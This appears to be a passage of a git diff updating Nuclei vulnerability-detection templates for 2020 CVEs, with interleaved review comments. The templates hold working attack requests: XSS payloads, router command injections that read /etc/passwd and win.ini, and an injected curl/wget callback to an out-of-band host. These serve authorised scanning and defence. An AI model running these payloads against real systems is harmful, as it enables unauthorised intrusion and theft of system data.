@@ -1,36 +0,0 @@ -id: CVE-2020-13483 -info: - name: Bitrix24 through 20.0.0 allows XSS - author: pikpikcu,3th1c_yuk1 - severity: medium - description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. - reference: - - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 - - https://twitter.com/brutelogic/status/1483073170827628547 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-13483 - cwe-id: CWE-79 - tags: cve,cve2020,xss,bitrix -requests: - - method: GET - path: - - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>' - - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '*/)});function __MobileAppList(){alert(1)}//' - - "function(handler){};function __MobileAppList(test){alert(document.domain);};//" - condition: or - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-13638.yaml b/nuclei-templates/CVE-2020/CVE-2020-13638.yaml index 9e19423308..041b88e439 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13638.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13638.yaml 
@@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13638 cwe-id: CWE-269 - epss-score: 0.324 - epss-percentile: 0.96575 + epss-score: 0.39352 + epss-percentile: 0.97152 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true @@ -96,5 +96,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200f308b07b55b6fb74c46385ddbd097d885a10d1c7bc10744ee56d56b42b960d7022100b975be94d469a370d61f2adf2bbad48c115e5a35e426276e555d9b281daa8141:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e7f135f57aac986c270d66ef6afc8f90e89fd565b52145eb6316f4a20da0e4b5022100876e3b9f1953ea0c2910db7241c0c1297552adc50ced66724b0c4758e85e790f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-13700.yaml b/nuclei-templates/CVE-2020/CVE-2020-13700.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-13700.yaml rename to nuclei-templates/CVE-2020/CVE-2020-13700.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-13820.yaml b/nuclei-templates/CVE-2020/CVE-2020-13820.yaml index e84200a2d4..01d5fcd3e6 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13820.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13820.yaml 
@@ -6,22 +6,33 @@ info: severity: medium description: | Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Extreme Management Center. reference: - https://medium.com/@0x00crash/xss-reflected-in-extreme-management-center-8-4-1-24-cve-2020-13820-c6febe951219 - https://gtacknowledge.extremenetworks.com/articles/Solution/000051136 - https://gtacknowledge.extremenetworks.com - https://nvd.nist.gov/vuln/detail/CVE-2020-13820 + - https://documentation.extremenetworks.com/release_notes/netsight/XMC_8.5.0_Release_Notes.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-13820 cwe-id: CWE-79 + epss-score: 0.00289 + epss-percentile: 0.65704 + cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: extremenetworks + product: extreme_management_center shodan-query: title:"Extreme Management Center" - verified: "true" - tags: cve,cve2020,xss,extremenetworks + tags: cve2020,cve,xss,extremenetworks -requests: +http: - method: GET path: - "{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)" 
@@ -43,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/10/05 +# digest: 490a0046304402203b2fba8721ad31fdedf35ac64fd1aa9f3daf248c5a28d0e177bc476aef75fc3b02207c1ceaaceaae8e7f5b2fb30ff8a741683dff8b8466099618f50ab7e864979a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-13851.yaml b/nuclei-templates/CVE-2020/CVE-2020-13851.yaml index 5d5c1f36eb..fdaef27edb 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-13851.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-13851.yaml @@ -10,13 +10,14 @@ info: - https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2020-13851 - https://www.coresecurity.com/advisories + - https://github.com/hadrian3689/pandorafms_7.44 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-13851 cwe-id: CWE-78 - epss-score: 0.96827 - epss-percentile: 0.99604 + epss-score: 0.96952 + epss-percentile: 0.99674 cpe: cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:* metadata: verified: "true" @@ -24,7 +25,7 @@ info: vendor: pandorafms product: pandora_fms shodan-query: title:"Pandora FMS" - tags: packetstorm,cve,cve2020,rce,pandora,unauth,artica + tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms http: - raw: @@ -50,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220320f30386e153f58d47a6a4f294a81f205688bf7e6706b1019ce1275767b8eff022100c6558e6920bb087c33bd12cd6c04ce47f4dbb1d6b627a562e711abd97149312b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022058dede621391a5c5aa3cbab99614f6e05eb1c25d174cb444fc225088cfc531a3022100d43ab48e876ed266cffa72d5a17bcaf610d3d10d131b046556958fd7be786cf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2020/cve-2020-13937.yaml b/nuclei-templates/CVE-2020/CVE-2020-13937.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-13937.yaml rename to nuclei-templates/CVE-2020/CVE-2020-13937.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14144.yaml b/nuclei-templates/CVE-2020/CVE-2020-14144.yaml index 943dcb48a3..4f34dc02ce 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-14144.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-14144.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides." + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Fixed in version 1.16.7. reference: - https://dl.gitea.io/gitea/1.16.6 @@ -18,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2020-14144 cwe-id: CWE-78 - epss-score: 0.97212 - epss-percentile: 0.99783 + epss-score: 0.97181 + epss-percentile: 0.99775 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: gitea product: gitea shodan-query: html:"Powered by Gitea Version" - tags: cve,cve2020,rce,gitea,authenticated,git,intrusive + tags: cve2020,cve,rce,gitea,authenticated,git,intrusive http: - raw: 
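Review bot: The added `impact` text states that an attacker could execute arbitrary code without the precondition the description spells out: the exploit needs an authenticated account that has been granted git-hook privileges with `ENABLE_GIT_HOOKS` on, and the vendor disputes it as intended functionality. Suggest `impact: | An authenticated user who has been granted git hook privileges (ENABLE_GIT_HOOKS) can execute arbitrary commands on the Gitea host; the vendor treats this as by-design, so findings should be triaged as a privilege-scoping issue rather than unauthenticated RCE.` Also, the `remediation: Fixed in version 1.16.7.` context line sits oddly next to an affected range of 1.1.0 through 1.12.5; worth reconciling against the referenced release notes. The `http:` raw request block continues outside this hunk.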
@@ -98,4 +100,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true -# digest: 4a0a00473045022100da14ee38fd4ca9882d078743a1c158d3eb4306c144ad47eb5f2f5c6cf2949a6a022048de5727705f006845ff35f9e549546d8ca094a851fde2685a5e502bc8eb6306:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e398d9d82ff8b9b88f71c78ed86a11cd12d18203426a0f2396f654d19d04022a0220753f0b26dc09689a5afbbb739a698e8340f6bb5296ac8e88f3fc93d75ab2cd3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-14179.yaml b/nuclei-templates/CVE-2020/CVE-2020-14179.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-14179.yaml rename to nuclei-templates/CVE-2020/CVE-2020-14179.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-14408.yaml b/nuclei-templates/CVE-2020/CVE-2020-14408.yaml index 8f848663db..36f102aa68 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-14408.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-14408.yaml @@ -1,10 +1,9 @@ id: CVE-2020-14408 - info: - name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting + name: Agentejo Cockpit 0.10.2 - Reflected XSS author: edoardottt severity: medium - description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. + description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 
@@ -13,30 +12,24 @@ info: reference: - https://github.com/agentejo/cockpit/issues/1310 - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408 metadata: verified: true - tags: cve,cve2020,cockpit,agentejo,xss,oss - + tags: cve,cve2022,cockpit,agentejo,xss,oss requests: - method: GET path: - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" - matchers-condition: and matchers: - - type: word part: body words: - "redirectTo = '/92874';alert(document.domain)//280';" - - type: word part: header words: - "text/html" - - type: status status: - 200 - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2020/CVE-2020-14864.yaml b/nuclei-templates/CVE-2020/CVE-2020-14864.yaml index de64bc96de..1a74ce325d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-14864.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-14864.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-14864 - tags: cve,cve2020,oracle,lfi + tags: cve,cve2020,oracle,lfi,kev requests: - method: GET path: diff --git a/nuclei-templates/CVE-2020/cve-2020-15148.yaml b/nuclei-templates/CVE-2020/CVE-2020-15148.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-15148.yaml rename to nuclei-templates/CVE-2020/CVE-2020-15148.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-15505.yaml b/nuclei-templates/CVE-2020/CVE-2020-15505.yaml deleted file mode 100644 index d5896cbea1..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-15505.yaml +++ /dev/null 
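Review bot: The tag line becomes `tags: cve,cve2022,cockpit,agentejo,xss,oss`, but the template is CVE-2020-14408, so the year tag should stay `cve2020`; with `cve2022` the template drops out of any `-tags cve2020` run and lands in the wrong year set. Restore `tags: cve,cve2020,cockpit,agentejo,xss,oss`. The rest of this hunk (and the `@@ -1,10 +1,9 @@` one above it) reverts the earlier wording and layout to an older revision, including the legacy `requests:` key and the removed blank lines, which looks like the sync pulled a stale copy rather than an intended change; worth checking which side is canonical before this is treated as the current template.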
@@ -1,40 +0,0 @@ -id: CVE-2020-15505 -info: - name: RCE in MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - author: dwisiswant0 - severity: critical - description: | - A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors. - # THIS TEMPLATE IS ONLY FOR DETECTING - # To carry out further attacks, please see reference[2] below. - # This template works by passing a Hessian header, otherwise; - # it will return a 403 or 500 internal server error. Reference[3]. - reference: - - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html - - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 - - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10 - - https://github.com/orangetw/JNDI-Injection-Bypass - tags: cve,cve2020,mobileiron,rce,sentry - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-15505 -requests: - - raw: - - | - POST /mifs/.;/services/LogService HTTP/1.1 - Host: {{Hostname}} - Referer: https://{{Hostname}} - Content-Type: x-application/hessian - Connection: close - - {{hex_decode('630200480004')}} - matchers-condition: and - matchers: - - type: word - words: - - "application/x-hessian" - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-15867.yaml b/nuclei-templates/CVE-2020/CVE-2020-15867.yaml index ff8437efbc..95dd9b282a 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-15867.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-15867.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later). reference: @@ -17,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-15867 - epss-score: 0.96643 - epss-percentile: 0.99534 + epss-score: 0.96659 + epss-percentile: 0.99554 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true @@ -96,4 +98,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true -# digest: 490a0046304402202bc22d5d6de1a82926e74e6b311921508a1995f602cdee6de3d5e48c67f43fbf022077ae3e84c30d0668d4e33bd6024d18f8d475dc00a0358d53509ca18dbbc088b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a215b7c44f2fb218def60e0d879afe798183c5f934d27d519c1f12a15ae90bd022071abea3ccb7139b8aaf1d296ad270e2afd6df803ea81281e87c092e97711d955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-15895.yaml b/nuclei-templates/CVE-2020/CVE-2020-15895.yaml index 17440857bf..f394848dde 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-15895.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-15895.yaml 
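Review bot: The added `impact` line reads as unauthenticated RCE, but the CVSS vector on the same file is `PR:H` and the description says the issue needs the git-hooks feature to be granted to a non-administrative user; the impact text should carry that precondition, e.g. `impact: | A user who has been granted git hook access can execute arbitrary commands on the Gogs host; the exposure is a privilege escalation for already-trusted accounts, not an unauthenticated entry point.` Without it the wording implies more than the 7.2 score the file records. The `http:` raw request block is outside these hunks.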
@@ -1,26 +1,36 @@ id: CVE-2020-15895 info: - name: D-Link DIR-816L - Cross Site Scripting + name: D-Link DIR-816L 2.x - Cross-Site Scripting author: edoardottt severity: medium description: | - An XSS issue was discovered on D-Link DIR-816L devices 2.x before 1.10b04Beta02. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter, before it's printed on the webpage. + D-Link DIR-816L devices 2.x before 1.10b04Beta02 contains a cross-site scripting vulnerability. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter before being printed on the webpage. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow for theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. 
reference: - - https://research.loginsoft.com/vulnerability/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-15895 - https://research.loginsoft.com/bugs/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/ - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169 + - https://nvd.nist.gov/vuln/detail/CVE-2020-15895 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-15895 cwe-id: CWE-79 + epss-score: 0.00187 + epss-percentile: 0.55045 + cpe: cpe:2.3:o:dlink:dir-816l_firmware:2.06:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: dlink + product: dir-816l_firmware shodan-query: html:"DIR-816L" - tags: cve,cve2020,dlink,xss + tags: cve2020,cve,dlink,xss -requests: +http: - method: GET path: - "{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//" @@ -42,3 +52,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100cc380765700ef1b2b7da3e313af50c0fde3da0fbfcd22a8d457ce221e7fc062b022054cf01c8bbed23df43e959ca8c4f1ca8a91b866aabce40c770d01b43ec7468eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-16139.yaml b/nuclei-templates/CVE-2020/CVE-2020-16139.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16139.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16139.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-16920.yaml b/nuclei-templates/CVE-2020/CVE-2020-16920.yaml deleted file mode 100644 index 66a1295845..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-16920.yaml +++ /dev/null 
@@ -1,59 +0,0 @@ -id: cve-2019-16920 - -info: - name: Unauthenticated Multiple D-Link Routers RCE - author: dwisiswant0 - severity: critical - description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. - - # References: - # - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r - -requests: - - raw: - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/ - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp - Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp - Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - - "\\[(font|extension|file)s\\]" - condition: or - part: body - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-16952.yaml b/nuclei-templates/CVE-2020/CVE-2020-16952.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-16952.yaml rename to nuclei-templates/CVE-2020/CVE-2020-16952.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-17362.yaml b/nuclei-templates/CVE-2020/CVE-2020-17362.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17362.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17362.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-17456.yaml b/nuclei-templates/CVE-2020/CVE-2020-17456.yaml index 7dd3efc2b6..b7e29cd0a0 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-17456.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-17456.yaml 
@@ -1,21 +1,37 @@ id: CVE-2020-17456 info: - name: Seowon SLC-130 And SLR-120S - Unauthenticated Remote Code Execution + name: SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution author: gy741,edoardottt severity: critical - description: SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the system_log.cgi page. + description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ - https://nvd.nist.gov/vuln/detail/CVE-2020-17456 - tags: rce,seowon,router,unauth,iot,cve,cve2020,oast + - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html + - https://www.exploit-db.com/exploits/50821 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2020-17456 cwe-id: CWE-78 + epss-score: 0.96263 + epss-percentile: 0.99495 + cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: seowonintech + product: slc-130_firmware + tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech +variables: + useragent: '{{rand_base(6)}}' -requests: +http: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 
@@ -30,9 +46,8 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 + Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -40,6 +55,11 @@ requests: words: - "http" + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" + - type: word part: header words: @@ -47,4 +67,5 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 +# digest: 4a0a00473045022100dfd063b9fa64a8c67ede0a35c9c5ef23fc7ffd9b31d32de5343eaa430bd12815022063f498b2e3e49255cc16b78a9ae2e77f66144915d845e6feae3ced267930d7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-17463.yaml b/nuclei-templates/CVE-2020/CVE-2020-17463.yaml index 5c0c9bf50d..780e36249a 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-17463.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-17463.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Fixed in version 115 reference: - https://www.exploit-db.com/exploits/48741 
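Review bot: The `interactsh_request` word matcher added at `@@ -40,6 +55,11 @@` has no comment, and its purpose — checking that the callback echoes the `User-Agent: {{useragent}}` value generated by `rand_base(6)` in `variables:` — is only recoverable by reading the payload change in `@@ -30,9 +46,8 @@`. A reader seeing a second callback check next to the existing `http` word matcher may drop it as redundant. Suggested comment above the new `- type: word`: `# the callback must carry the per-run User-Agent from variables.useragent, so unrelated traffic reaching the interactsh host is not reported as a hit`. The `matchers:` list this sits in begins before the hunk.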
@@ -18,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17463 cwe-id: CWE-89 - epss-score: 0.92663 - epss-percentile: 0.9876 + epss-score: 0.94399 + epss-percentile: 0.99154 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: thedaylightstudio product: fuel_cms shodan-query: http.title:"fuel cms" - tags: packetstorm,cve,cve2020,sqli,fuel-cms,kev + tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio http: - raw: @@ -61,4 +63,4 @@ http: - 'status_code_3 == 200' - 'contains(body_1, "FUEL CMS")' condition: and -# digest: 4b0a004830460221009195dfdfc3c1a5e8422577e8917d60bc6873a4825bcf511365e818ea5f36cfd3022100af65296d11033dadc4be3d9563124da952ddff6c8cce5b19562ef31e99bc76d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a2e9d98f445334774bd7fe2ae6afd6669809096d55a82f9b6be1e9015a639f2022025f1354f6fd86600a6cc7c44e2401397db0d4619dc406e7213f617f08f281f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-17518.yaml b/nuclei-templates/CVE-2020/CVE-2020-17518.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-17518.yaml rename to nuclei-templates/CVE-2020/CVE-2020-17518.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-17526.yaml b/nuclei-templates/CVE-2020/CVE-2020-17526.yaml index 33fae9deff..c5d48a8103 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-17526.yaml +++ 